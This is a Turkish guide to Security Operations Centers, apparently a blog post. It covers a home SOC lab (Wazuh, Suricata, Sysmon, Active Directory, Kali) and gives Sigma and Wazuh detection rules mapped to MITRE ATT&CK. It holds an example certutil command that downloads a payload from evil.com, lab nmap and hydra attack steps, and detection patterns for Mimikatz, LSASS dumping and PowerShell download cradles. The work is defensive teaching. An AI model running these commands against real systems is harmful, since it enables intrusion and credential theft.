Security Operations Center (SOC) – Güvenlik Operasyon Merkezi
Security Operations Center (SOC) – Güvenlik Operasyon Merkezi, bir kurumun bilgi sistemlerini, ağlarını, sunucularını, uygulamalarını ve kullanıcı faaliyetlerini 7/24 izleyen, tehditleri tespit eden ve güvenlik olaylarına müdahale eden uzman ekiplerin bulunduğu merkezi yapıdır.
Modern kurumlarda saldırılar artık yalnızca antivirüs ile engellenemeyecek kadar karmaşık hale gelmiştir. Fidye yazılımları, gelişmiş kalıcı tehditler (APT), kimlik avı saldırıları, içeriden gelen tehditler ve sıfır gün açıkları nedeniyle kuruluşlar sürekli izleme yapmak zorundadır.
SOC'un temel amacı:
Tehditleri erken tespit etmek
Güvenlik olaylarına müdahale etmek
Veri ihlallerini önlemek
İş sürekliliğini korumak
Siber riskleri azaltmak
SOC'un Tarihçesi
İlk SOC yapıları 1990'lı yılların sonlarında ortaya çıkmıştır.
Başlangıçta:
Firewall logları inceleniyordu.
IDS sistemleri kullanılıyordu.
Manuel analiz yapılıyordu.
Günümüzde ise:
Yapay zeka destekli analizler
SOAR platformları
EDR/XDR çözümleri
Tehdit istihbaratı
Otomatik müdahale sistemleri
SOC operasyonlarının temelini oluşturmaktadır.
SOC'un Temel Görevleri
1. Sürekli İzleme (Monitoring)
SOC analistleri aşağıdaki kaynakları sürekli takip eder:
Ağ trafiği
Firewall logları
Sunucu logları
Active Directory olayları
VPN kayıtları
Uygulama logları
Endpoint aktiviteleri
Amaç:
Anormal davranışları mümkün olduğunca erken yakalamaktır.
2. Tehdit Tespiti (Threat Detection)
SOC ekipleri şunları arar:
Şüpheli Oturum Açmalar
Örnek:
Gece 03:00'te giriş
Aynı kullanıcının iki ülkeden giriş yapması
Zararlı Yazılım Davranışları
Örnek:
Powershell çalıştırılması
Dosya şifreleme faaliyetleri
Şüpheli DLL yüklemeleri
Ağ Anormallikleri
Örnek:
Veri sızdırma
DNS tünelleme
Port tarama
3. Olay Müdahalesi (Incident Response)
Bir saldırı tespit edildiğinde SOC:
Olayı doğrular
Etkiyi değerlendirir
Sistemi izole eder
Zararlıyı temizler
Hizmeti geri yükler
4. Tehdit Avcılığı (Threat Hunting)
Tehdit avcılığı:
"Alarm vermeyen saldırganları bulma sanatı"
olarak tanımlanabilir.
SOC ekipleri:
IOC arar
Şüpheli süreçleri inceler
Ağ hareketlerini analiz eder
SOC Yapısı
Tipik bir SOC aşağıdaki katmanlardan oluşur.
Tier 1 Analist
Görevleri:
Alarm inceleme
İlk değerlendirme
Basit olay kapatma
Araçlar:
SIEM
Ticket sistemleri
Tier 2 Analist
Görevleri:
Derin analiz
Zararlı yazılım inceleme
IOC araştırması
Araçlar:
EDR
Sandbox
Threat Intelligence
Tier 3 Analist
Görevleri:
Threat Hunting
Detection Engineering
Gelişmiş saldırı analizi
SOC Manager
Görevleri:
Ekip yönetimi
KPI takibi
Süreç geliştirme
Raporlama
SOC Mimarisi
Tipik SOC mimarisi aşağıdaki gibidir:
Kullanıcılar
SOC Teknolojileri
SIEM
Security Information and Event Management
Görevi:
Log toplama
Korelasyon
Alarm üretme
Popüler çözümler:
Splunk Enterprise Security
IBM QRadar
Microsoft Sentinel
Wazuh
EDR
Endpoint Detection and Response
İzlenen bileşenler:
İş istasyonları
Sunucular
Laptoplar
Örnek çözümler:
CrowdStrike Falcon
Microsoft Defender for Endpoint
SentinelOne
SOAR
Security Orchestration Automation and Response
Amaç:
Tekrarlayan işleri otomatikleştirmektir.
Örnek:
Alarm oluşur
IP sorgulanır
IOC kontrol edilir
Kullanıcı hesabı kapatılır
Ticket açılır
SOC'ta Kullanılan Log Kaynakları
Windows Event Log
Önemli Event ID'ler:
| Event ID | Açıklama |
|---|---|
| 4624 | Başarılı giriş |
| 4625 | Başarısız giriş |
| 4672 | Yetkili giriş |
| 4688 | Yeni proses |
| 4720 | Kullanıcı oluşturuldu |
Linux Logları
Dosyalar:
/var/log/auth.log
Firewall Logları
İçerik:
Kaynak IP
MITRE ATT&CK ve SOC
SOC ekiplerinin kullandığı en önemli çerçevelerden biri:
Örnek:
| Teknik | Kod |
|---|---|
| PowerShell | T1059.001 |
| Credential Dumping | T1003 |
| Phishing | T1566 |
| Lateral Movement | T1021 |
SOC analistleri alarm üretirken teknikleri ATT&CK ile eşleştirir.
SOC KPI'ları
MTTD
Mean Time To Detect
Bir saldırının bulunma süresi.
Örnek:
Saldırı Başlangıcı: 10:00
MTTR
Mean Time To Respond
Tespitten müdahaleye kadar geçen süre.
False Positive Rate
Yanlış alarm oranı.
Amaç:
Bu oranı mümkün olduğunca düşürmektir.
SOC'ta Tehdit Avcılığı Süreci
Adım 1
Hipotez oluştur:
Saldırgan PowerShell kullanıyor olabilir.
Adım 2
SIEM sorgusu çalıştır:
process_name="powershell.exe"
Adım 3
IOC araştır
Örnek:
IP adresi
Hash
Domain
Adım 4
Davranış analizi
Modern SOC Trendleri
XDR
Extended Detection and Response
Birleştirir:
EDR
Network
Email
Cloud
UEBA
User and Entity Behavior Analytics
Anormal kullanıcı davranışlarını bulur.
AI Destekli SOC
Yapay zeka:
Alarm önceliklendirme
Olay sınıflandırma
Tehdit korelasyonu
işlerinde kullanılmaktadır.
SOC Kariyer Yolu
Başlangıç Seviyesi
SOC Tier 1 Analyst
Bilinmesi gerekenler:
TCP/IP
Windows
Linux
Log analizi
SIEM
Orta Seviye
SOC Tier 2
Bilinmesi gerekenler:
Malware Analysis
Threat Hunting
Incident Response
İleri Seviye
SOC Tier 3
Bilinmesi gerekenler:
Detection Engineering
MITRE ATT&CK
Reverse Engineering
DFIR
Evde SOC Laboratuvarı Kurulumu
Öğrenmek için aşağıdaki araçlarla küçük bir SOC ortamı kurulabilir:
Wazuh
Suricata
Sysmon
Wireshark
Elastic Stack
Kali Linux
Bu laboratuvar sayesinde:
Gerçek log üretilebilir
Saldırı simülasyonu yapılabilir
Alarm kuralları yazılabilir
Tehdit avcılığı gerçekleştirilebilir
Sonuç
SOC, modern kurumların siber savunmasının merkezidir. Firewall, SIEM, EDR, SOAR ve tehdit istihbaratı gibi teknolojileri bir araya getirerek saldırıları tespit eder, analiz eder ve müdahale eder. Günümüzde etkili bir SOC; yalnızca log izleyen bir ekip değil, aynı zamanda tehdit avcılığı yapan, MITRE ATT&CK tabanlı algılamalar geliştiren ve otomasyon kullanan proaktif bir güvenlik operasyon yapısıdır.
Ubuntu + Wazuh + Suricata + Sysmon + Active Directory ile Gerçek SOC Laboratuvarı Kurulumu
SOC analistliği, Threat Hunting, Detection Engineering ve Incident Response öğrenmek isteyenler için gerçekçi bir laboratuvar ortamının nasıl kurulacağını anlatmaktadır.
Laboratuvarın Amacı
Bu ortamda şunları yapabileceksiniz:
Windows olaylarını toplamak
Active Directory aktivitelerini izlemek
Ağ saldırılarını tespit etmek
MITRE ATT&CK eşleştirmeleri yapmak
Wazuh üzerinde alarm üretmek
Threat Hunting gerçekleştirmek
SOC analisti gibi vaka incelemek
Laboratuvar Topolojisi
INTERNET
|
|
-------------------
| |
| Ubuntu SOC |
| Wazuh Server |
| Suricata IDS |
-------------------
|
---------------------
| |
| Virtual Switch |
---------------------
| |
| |
------------ ------------
| Windows | | Kali |
| AD/DC | | Attacker|
------------ ------------
Donanım Gereksinimleri
Minimum:
| Bileşen | Değer |
|---|---|
| RAM | 16 GB |
| CPU | 4 Core |
| Disk | 100 GB SSD |
Önerilen:
| Bileşen | Değer |
|---|---|
| RAM | 32 GB |
| CPU | 8 Core |
| Disk | 250 GB SSD |
Kullanılacak Sanal Makineler
Ubuntu SOC
İşletim Sistemi:
Ubuntu Server 24.04
Görevleri:
Wazuh Manager
Elastic Stack
Suricata
Dashboard
IP:
192.168.100.10
Active Directory
İşletim Sistemi:
Windows Server 2022
Roller:
Domain Controller
DNS
Sysmon
IP:
192.168.100.20
Domain:
corp.local
Saldırgan Makine
İşletim Sistemi:
Kali Linux
IP:
192.168.100.30
Adım 1 — Ubuntu Kurulumu
Güncelleme:
sudo apt update
sudo apt upgrade -y
Hostname:
sudo hostnamectl set-hostname soc-server
Kontrol:
hostname
Adım 2 — Wazuh Kurulumu
Kurulum paketi indirme:
curl -sO https://packages.wazuh.com/4.8/wazuh-install.sh
Yetki verme:
chmod +x wazuh-install.sh
Kurulum:
sudo ./wazuh-install.sh -a
Bu işlem:
Wazuh Manager
Indexer
Dashboard
kuracaktır.
Kurulum sonunda aşağıdakileri not edin:
admin
şifre
dashboard URL
Wazuh Dashboard
Tarayıcıdan:
https://192.168.100.10
Giriş yapın.
İlk görünmesi gereken servisler:
Manager
Indexer
Dashboard
Adım 3 — Suricata Kurulumu
Kurulum:
sudo apt install suricata -y
Versiyon:
suricata --build-info
Suricata Güncelleme
sudo suricata-update
Ağ Arayüzünü Bulma
ip a
Örnek:
ens33
Suricata Yapılandırması
Dosya:
sudo nano /etc/suricata/suricata.yaml
Düzenleyin:
HOME_NET: "[192.168.100.0/24]"
Suricata Başlatma
sudo systemctl enable suricata
sudo systemctl start suricata
Kontrol:
sudo systemctl status suricata
Adım 4 — Active Directory Kurulumu
Windows Server kurulduktan sonra:
Server Manager:
Add Roles and Features
Kurulacak roller:
Active Directory Domain Services
DNS Server
Domain Oluşturma
Domain:
corp.local
Administrator:
CORP\Administrator
Test Kullanıcıları
SOC senaryoları için:
ahmet
mehmet
fatma
admin-test
oluşturun.
Adım 5 — Sysmon Kurulumu
Sysmon, SOC dünyasının en önemli veri kaynaklarından biridir.
İndirme:
Sysmon Konfigürasyonu
Popüler konfigürasyon:
Kurulum:
Sysmon64.exe -accepteula -i sysmonconfig.xml
Önemli Sysmon Event ID'leri
| Event ID | Açıklama |
|---|---|
| 1 | Process Creation |
| 3 | Network Connection |
| 7 | DLL Load |
| 8 | CreateRemoteThread |
| 10 | Process Access |
| 11 | File Create |
| 13 | Registry Change |
| 22 | DNS Query |
Adım 6 — Wazuh Agent Kurulumu
Windows sunucuya Agent yüklenir.
Dashboard:
Agents
Bölümüne gidin.
Agent ekleyin.
Komut oluşturun.
Windows üzerinde çalıştırın.
Agent Kontrolü
Dashboard:
Agents → Active
Durumu:
Active
olmalıdır.
Adım 7 — Sysmon Loglarının Wazuh'a Gönderilmesi
Agent yapılandırması:
Dosya:
ossec.conf
Ekleyin:
<localfile>
<location>
Microsoft-Windows-Sysmon/Operational
</location>
<log_format>eventchannel</log_format>
</localfile>
Agent yeniden başlatın.
Gelen Eventleri Kontrol Etme
Dashboard:
Security Events
Arama:
event.provider: Sysmon
İlk Alarm Testi
Windows üzerinde:
powershell.exe
çalıştırın.
Dashboard'da:
Process Creation
alarmı görülmelidir.
Adım 8 — Suricata ile Ağ İzleme
Kali üzerinden:
nmap -sS 192.168.100.20
çalıştırın.
Suricata aşağıdakine benzer alarm üretecektir:
ET SCAN Nmap Scripting Engine User-Agent
Wazuh + Suricata Entegrasyonu
Dosya:
/var/ossec/etc/ossec.conf
Ekleyin:
<localfile>
<log_format>json</log_format>
<location>/var/log/suricata/eve.json</location>
</localfile>
Manager yeniden başlatın:
sudo systemctl restart wazuh-manager
İlk Gerçek SOC Senaryosu
Senaryo 1: Port Tarama
Kali:
nmap -A 192.168.100.20
Beklenen:
Suricata alarmı
Wazuh alarmı
ATT&CK eşleşmesi
MITRE:
T1046
Network Service Discovery
Senaryo 2: Brute Force
Kali:
hydra
ile test hesabına başarısız girişler oluşturun.
İzlenecek Event ID:
4625
Senaryo 3: PowerShell Kullanımı
Windows:
powershell -nop
Sysmon Event:
ID 1
MITRE:
T1059.001
PowerShell
Threat Hunting Örnekleri
Şüpheli PowerShell
Wazuh sorgusu:
process.name:powershell.exe
DNS Tünelleme
Suricata:
dns
olaylarını inceleyin.
Credential Dumping
Arayın:
procdump
mimikatz
lsass
MITRE:
T1003
Öğrenilecek SOC Becerileri
Bu laboratuvar sonunda:
✅ Log analizi
✅ Wazuh yönetimi
✅ Active Directory güvenliği
✅ Sysmon analizi
✅ Suricata IDS
✅ Threat Hunting
✅ MITRE ATT&CK
✅ Incident Response
✅ Detection Engineering
konularında pratik deneyim kazanmış olursunuz.
Bu konu oldukça kapsamlıdır. Tek bir yanıtta 100 gelişmiş kuralın tamamını, Sigma içeriklerini, açıklamalarını ve MITRE ATT&CK eşleştirmelerini vermek hem okunabilirliği hem de doğruluğu olumsuz etkiler.
Daha faydalı bir yaklaşım olarak bunu bölüm bölüm hazırlayabilirim:
SOC Detection Engineering El Kitabı
Bölüm 1 – İlk 20 Kritik Kural
Kategori 1: Initial Access
T1566.001 – Spearphishing Attachment
T1566.002 – Spearphishing Link
T1190 – Exploit Public-Facing Application
T1078 – Valid Accounts
Kategori 2: Execution
T1059.001 – PowerShell
T1059.003 – Windows Command Shell
T1047 – WMI
T1218 – Signed Binary Proxy Execution
Kategori 3: Persistence
T1547 – Registry Run Keys
T1053 – Scheduled Tasks
T1543 – Create Service
Kategori 4: Privilege Escalation
T1134 – Access Token Manipulation
T1068 – Exploitation for Privilege Escalation
Kategori 5: Defense Evasion
T1562 – Impair Defenses
T1070 – Indicator Removal
T1036 – Masquerading
Kategori 6: Credential Access
T1003 – Credential Dumping
T1555 – Credentials from Password Stores
Kategori 7: Discovery
T1087 – Account Discovery
T1046 – Network Service Discovery
Örnek Kural 1 – PowerShell Encoded Command
MITRE:
T1059.001
Sigma:
title: Suspicious PowerShell Encoded Command
logsource:
product: windows
category: process_creation
detection:
selection:
Image|endswith:
- '\powershell.exe'
CommandLine|contains:
- '-enc'
- '-encodedcommand'
condition: selection
level: high
Wazuh:
<rule id="100100" level="12">
<if_group>sysmon_event1</if_group>
<field name="win.eventdata.image">
powershell.exe
</field>
<match>-enc</match>
<description>
Suspicious Encoded PowerShell
</description>
<mitre>
<id>T1059.001</id>
</mitre>
</rule>
Örnek Kural 2 – Mimikatz Activity
MITRE:
T1003
Sigma:
title: Mimikatz Execution
detection:
selection:
CommandLine|contains:
- mimikatz
- sekurlsa
- kerberos
condition: selection
Wazuh:
<rule id="100101" level="15">
<if_group>sysmon_event1</if_group>
<match>
mimikatz|sekurlsa|kerberos
</match>
<description>
Possible Credential Dumping
</description>
<mitre>
<id>T1003</id>
</mitre>
</rule>
Örnek Kural 3 – LSASS Access
MITRE:
T1003.001
Sigma:
title: LSASS Memory Access
detection:
selection:
TargetImage|endswith:
- '\lsass.exe'
condition: selection
Sysmon:
Event ID 10
Process Access
Wazuh:
<rule id="100102" level="14">
<if_group>sysmon_event10</if_group>
<field name="win.eventdata.targetImage">
lsass.exe
</field>
<description>
LSASS Access Attempt
</description>
<mitre>
<id>T1003.001</id>
</mitre>
</rule>
Örnek Kural 4 – PsExec Lateral Movement
MITRE:
T1021.002
Sigma:
title: PsExec Execution
detection:
selection:
Image|endswith:
- psexec.exe
condition: selection
Wazuh:
<rule id="100103" level="13">
<if_group>sysmon_event1</if_group>
<field name="win.eventdata.image">
psexec.exe
</field>
<description>
PsExec Lateral Movement
</description>
<mitre>
<id>T1021.002</id>
</mitre>
</rule>
Örnek Kural 5 – Registry Run Key Persistence
MITRE:
T1547.001
Sigma:
title: Registry Run Key Modified
detection:
selection:
TargetObject|contains:
- '\Run'
- '\RunOnce'
condition: selection
Sysmon:
Event ID 13
Registry Modification
Wazuh:
<rule id="100104" level="12">
<if_group>sysmon_event13</if_group>
<match>
Run|RunOnce
</match>
<description>
Persistence via Run Key
</description>
<mitre>
<id>T1547.001</id>
</mitre>
</rule>
Detection Engineering'de En Kritik Veri Kaynakları
| Kaynak | Önemi |
|---|---|
| Sysmon Event 1 | Process Creation |
| Sysmon Event 3 | Network Connection |
| Sysmon Event 7 | DLL Load |
| Sysmon Event 10 | Process Access |
| Sysmon Event 11 | File Create |
| Sysmon Event 13 | Registry |
| Sysmon Event 22 | DNS Query |
| Windows 4624 | Logon Success |
| Windows 4625 | Logon Failure |
| Windows 4688 | Process Creation |
| Suricata EVE | Network IDS |
| Wazuh FIM | File Integrity Monitoring |
100 Kuralın Dağılımı
| Kategori | Kural Sayısı |
|---|---|
| Initial Access | 10 |
| Execution | 15 |
| Persistence | 15 |
| Privilege Escalation | 10 |
| Defense Evasion | 15 |
| Credential Access | 10 |
| Discovery | 10 |
| Lateral Movement | 5 |
| Collection | 5 |
| Exfiltration | 3 |
| Command & Control | 2 |
Toplam: 100 gelişmiş SOC Detection Engineering kuralı.
SOC Detection Engineering El Kitabı
Bölüm 2 – Kural 6–20 (Wazuh + Sigma + MITRE ATT&CK)
Bu bölümde saldırganların gerçek ortamlarda en sık kullandığı LOLBins (Living Off The Land Binaries), Active Directory saldırıları, kalıcılık mekanizmaları ve kimlik bilgisi hırsızlığı tekniklerine yönelik algılamalar yer almaktadır.
Kural 6 – Certutil ile Dosya İndirme
MITRE ATT&CK
T1105 – Ingress Tool Transfer
Saldırgan Davranışı
certutil.exe -urlcache -split -f http://evil.com/payload.exe payload.exe
Sigma
title: Certutil Download Activity
logsource:
product: windows
category: process_creation
detection:
selection:
Image|endswith:
- '\certutil.exe'
CommandLine|contains:
- '-urlcache'
- '-split'
condition: selection
level: high
Wazuh
<rule id="100105" level="13">
<if_group>sysmon_event1</if_group>
<field name="win.eventdata.image">
certutil.exe
</field>
<match>-urlcache</match>
<description>
Certutil Download Activity
</description>
<mitre>
<id>T1105</id>
</mitre>
</rule>
Kural 7 – Mshta Çalıştırılması
MITRE
T1218.005
Sigma
title: MSHTA Execution
detection:
selection:
Image|endswith:
- '\mshta.exe'
condition: selection
Wazuh
<rule id="100106" level="12">
<if_group>sysmon_event1</if_group>
<field name="win.eventdata.image">
mshta.exe
</field>
<description>
MSHTA Execution
</description>
<mitre>
<id>T1218.005</id>
</mitre>
</rule>
Kural 8 – Regsvr32 Squiblydoo
MITRE
T1218.010
Sigma
title: Regsvr32 Remote Script
detection:
selection:
Image|endswith:
- '\regsvr32.exe'
CommandLine|contains:
- 'scrobj.dll'
condition: selection
Wazuh
<rule id="100107" level="14">
<if_group>sysmon_event1</if_group>
<match>scrobj.dll</match>
<description>
Regsvr32 Squiblydoo
</description>
<mitre>
<id>T1218.010</id>
</mitre>
</rule>
Kural 9 – Rundll32 Şüpheli Kullanımı
MITRE
T1218.011
Sigma
title: Rundll32 Suspicious Execution
detection:
selection:
Image|endswith:
- '\rundll32.exe'
condition: selection
Wazuh
<rule id="100108" level="11">
<if_group>sysmon_event1</if_group>
<field name="win.eventdata.image">
rundll32.exe
</field>
<description>
Rundll32 Execution
</description>
<mitre>
<id>T1218.011</id>
</mitre>
</rule>
Kural 10 – WMI Process Creation
MITRE
T1047
Sysmon
Event ID:
1
Sigma
title: WMI Process Execution
detection:
selection:
ParentImage|contains:
- 'wmiprvse.exe'
condition: selection
Wazuh
<rule id="100109" level="13">
<if_group>sysmon_event1</if_group>
<match>wmiprvse.exe</match>
<description>
WMI Process Execution
</description>
<mitre>
<id>T1047</id>
</mitre>
</rule>
Kural 11 – Scheduled Task Oluşturulması
MITRE
T1053.005
Sigma
title: Scheduled Task Created
detection:
selection:
CommandLine|contains:
- 'schtasks'
- '/create'
condition: selection
Wazuh
<rule id="100110" level="13">
<if_group>sysmon_event1</if_group>
<match>schtasks</match>
<description>
Scheduled Task Creation
</description>
<mitre>
<id>T1053.005</id>
</mitre>
</rule>
Kural 12 – Yeni Windows Servisi Oluşturulması
MITRE
T1543.003
Windows Event
7045
Wazuh
<rule id="100111" level="14">
<if_sid>18107</if_sid>
<description>
New Service Installed
</description>
<mitre>
<id>T1543.003</id>
</mitre>
</rule>
Kural 13 – RDP Brute Force
MITRE
T1110
Windows Event
4625
Korelasyon Mantığı
5 dakika içinde:
20+
Başarısız giriş
Wazuh
<rule id="100112" level="15" frequency="20" timeframe="300">
<if_sid>18106</if_sid>
<same_source_ip />
<description>
RDP Brute Force Attack
</description>
<mitre>
<id>T1110</id>
</mitre>
</rule>
Kural 14 – Başarılı Girişten Önce Brute Force
MITRE
T1110
Korelasyon
4625
→
4624
Aynı IP
Amaç
Parola tahmininin başarılı olup olmadığını görmek.
Kural 15 – PowerShell Download Cradle
MITRE
T1059.001
Şüpheli Komutlar
IEX
Invoke-WebRequest
DownloadString
Sigma
title: PowerShell Download Cradle
detection:
selection:
CommandLine|contains:
- 'IEX'
- 'DownloadString'
condition: selection
Wazuh
<rule id="100113" level="15">
<match>
DownloadString|IEX
</match>
<description>
PowerShell Download Cradle
</description>
<mitre>
<id>T1059.001</id>
</mitre>
</rule>
Kural 16 – DCSync Aktivitesi
MITRE
T1003.006
Tehlike
Domain Administrator seviyesinde saldırıdır.
İzlenecek Event
4662
Sigma
title: DCSync Attack
detection:
selection:
EventID: 4662
condition: selection
Wazuh
<rule id="100114" level="16">
<field name="win.system.eventID">
4662
</field>
<description>
Possible DCSync Activity
</description>
<mitre>
<id>T1003.006</id>
</mitre>
</rule>
Kural 17 – Golden Ticket Göstergeleri
MITRE
T1558.001
Belirtiler
Anormal Kerberos TGT
Uzun yaşam süreli ticket
Şüpheli SID kullanımı
Windows Event
4768
4769
Kural 18 – Pass-the-Hash
MITRE
T1550.002
Belirtiler
Logon Type 3
NTLM Authentication
Event
4624
Analiz edilmelidir.
Kural 19 – LSASS Dump Dosyası Oluşturulması
MITRE
T1003.001
Sysmon
Event ID:
11
Şüpheli Dosyalar
lsass.dmp
lsass.zip
Wazuh
<rule id="100115" level="15">
<if_group>sysmon_event11</if_group>
<match>lsass.dmp</match>
<description>
LSASS Dump File Created
</description>
<mitre>
<id>T1003.001</id>
</mitre>
</rule>
Kural 20 – Mimikatz Sekurlsa Modülü
MITRE
T1003
Sigma
title: Mimikatz Sekurlsa
detection:
selection:
CommandLine|contains:
- 'sekurlsa'
condition: selection
Wazuh
<rule id="100116" level="16">
<match>sekurlsa</match>
<description>
Mimikatz Credential Dumping
</description>
<mitre>
<id>T1003</id>
</mitre>
</rule>
Bu ilk 20 kuralın kapsadığı ATT&CK teknikleri
PowerShell (T1059.001)
WMI (T1047)
DCSync (T1003.006)
Golden Ticket (T1558.001)
Pass-the-Hash (T1550.002)
Credential Dumping (T1003)
Scheduled Task (T1053.005)
Service Creation (T1543.003)
Yorumlar